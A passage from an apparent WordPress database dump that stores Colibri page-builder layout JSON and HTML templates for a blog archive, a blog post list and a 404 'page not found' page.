\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','publish','closed','closed','','35','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=35',0,'extb_post_json','',0),(36,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n          <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>[colibri_layout_wrapper name=\"navigation_container\"]\n      <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n            <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n            <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n            <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>[/colibri_layout_wrapper]</div>\n  </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',34,'https://gsudice.dataconn.net/?p=36',0,'revision','',0),(37,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n        <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-134 style-local-37-m4\">\n                <!---->\n                <!---->\n                <h2 class=\"\">404</h2>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Sorry, page not found!</p>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n              <!---->\n              <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n                <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a  h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\"  data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span>                <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n                </span>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_404','','publish','closed','closed','','37','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&#038;p=37',0,'extb_post_main','',0),(38,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','publish','closed','closed','','38','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=38',0,'extb_post_json','',0),(39,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n        <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n              <!---->\n              <!---->\n              <h2 class=\"\">404</h2>\n            </div>\n            <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Sorry, page not found!</p>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n              <!---->\n              <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n                <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a  h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\"  data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span>                <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n                </span>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',37,'https://gsudice.dataconn.net/?p=39',0,'revision','',0),(40,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n    <!---->\n    <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n      <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2240-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2240-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-c